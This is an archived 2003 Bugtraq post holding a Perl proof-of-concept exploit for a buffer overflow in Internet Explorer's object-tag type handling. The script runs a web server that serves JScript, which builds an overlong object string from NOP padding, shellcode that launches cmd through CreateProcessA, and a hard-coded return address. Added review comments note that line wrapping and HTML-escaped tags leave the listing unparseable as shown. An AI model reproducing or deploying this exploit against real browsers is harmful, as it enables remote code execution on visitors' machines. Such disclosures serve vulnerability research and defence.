Message-ID: <20030607043100.10328.qmail@www.securityfocus.com>
Date: 7 Jun 2003 04:31:00 -0000
From: Alumni <alumni@...kz>
To: bugtraq@...urityfocus.com
Subject: IE-object tag longtype exploit




#!/usr/bin/perl

#=synopsis
#	06/06/03 - Proof of concept exploit by Sir Alumni (alumni@...kz)
#	IE-Object longtype dynamic call overflow
#	[...]
#	url://<$shellcode><'/'x48><jmp %ptr_sh>
#	the flaw actually exists in URLMON.DLL when converting backslashes
#       to wide char,
#	this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
#	[...]
#	
#	To exploit: 	i)  start server perl script;
#			ii) connect to http-service using IE/5.x.
#	Tested: IE-5.x, 6.0? on WinXP.
#	Note:	a) the shellcode size is limited up to 56 bytes;
#		b) the '$ret' may differ as well as the image base of KERNEL32.DLL;
#		c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript.
#=synopsis

use IO::Socket;

# Listener setup.  NOTE(review): the script never enables `use strict;` or
# `use warnings;`, so $port, $server, $shellcode, $nop, $ret and $client are
# all package globals.  Binding port 80 needs root on Unix hosts.
$port = 80;
# `Listen` is the accept backlog, not a port number; reusing $port (80) here
# works but is misleading.  `Reuse => 1` sets SO_REUSEADDR so the listener
# can be restarted immediately.  The die() message is a single string literal
# that the mail/archive line wrapping split across two lines (still valid
# Perl, but the message now contains an embedded newline).
$server = IO::Socket::INET->new (LocalPort => $port,
				Type =>SOCK_STREAM,
				Reuse => 1,
				Listen => $port) or die("Couldnt't create 
server socket\n");


# Payload constants.  The trailing comments are the author's own disassembly
# of each byte run.  NOTE(review): the three bare fragments `("cmd\x01")`,
# `CreateProcessA` and `ExitProcess` below are tails of those trailing
# comments that the mail/archive line wrapping pushed onto lines of their
# own -- as displayed here the listing does not parse.  The two absolute
# addresses are hard-coded for one specific KERNEL32.DLL image base (see
# synopsis note b); on any other build they resolve to something else.
$shellcode = 	"\x33\xdb".		# xor ebx, ebx
		"\x8b\xd4".		# mov edx, esp
		"\x80\xc6\xff".		# add dh, 0xFF
		"\xc7\x42\xfc\x63\x6d".	# mov dword ptr[edx-4], 0x01646D63 
("cmd\x01")
		"\x64\x01".		#
		"\x88\x5a\xff".		# mov byte ptr[edx-1], bl
		"\x8d\x42\xfc".		# lea eax, [edx-4]
		"\x8b\xf5".		# mov esi, ebp
		"\x56\x52".		# push esi; push edx
		"\x53\x53\x53\x53\x53\x53".	# push ebx
		"\x50\x53".		# push eax; push ebx
		"\xb8\x41\x77\xf7\xbf".	# mov eax, 0xBFF77741 ~= 
CreateProcessA
		"\xff\xd0".		# call eax
		"\xb8\xf8\xd4\xf8\xbf".	# mov eax, 0xBFF8D4F8 ~= 
ExitProcess
		"\xff\xd0".		# call eax
		"\xcc";			# int 3

# Single NOP byte; the JScript in the response repeats it to pad the
# payload up to `mins` characters.
$nop = "\x90";
# Doubled backslashes: Perl emits the literal text \xAB\x5D\x58, and it is
# the JScript string literal on the client that decodes the escapes.
$ret = "\\xAB\\x5D\\x58";


# Serve one client at a time: accept() blocks, then the request is read
# line by line until the bare CRLF that ends the HTTP header block.  The
# request line and headers are never inspected, and there is no access
# control -- every connection that reaches the port gets the same response.
while ($client = $server->accept()) {
	while (<$client>) {
		if ($_ =~ /^(\x0D\x0A)/) {

# Unquoted heredoc: $shellcode, $nop and $ret are interpolated and each
# "\r" becomes a carriage return, so every line ends in CRLF.
# NOTE(review): the angle brackets of the tags below appear HTML-escaped
# (&lt;script&gt;, &lt;object, &lt;/object&gt;), presumably by the archive
# rendering; as shown, the response carries literal entities, not markup.
print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
&lt;script&gt;\r
	var mins = 56;\r
	var size = 48;\r
	var sploit = "$shellcode";\r
	var strNop = "$nop";\r
	var strObj = '&lt;object type="';\r
	for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
	strObj += sploit;\r
	for (i=0;i<size;i++) strObj += '/';\r
	strObj += "CCCCCCCCDDDDDDDD";\r
	strObj += "$ret";\r
	strObj += '">Hello&lt;/object&gt;';\r
	alert(strObj);\r
	document.write(strObj);\r
&lt;/script&gt;\r
END_DATA
			# Response sent: close the connection.  The enclosing
			# while(<$client>) then reads undef from the closed
			# handle and falls through to the next accept().
			close($client);

		}
	}
}

# Only reached if accept() returns false (an error); there is no other
# exit path from the loop above.
close($server);


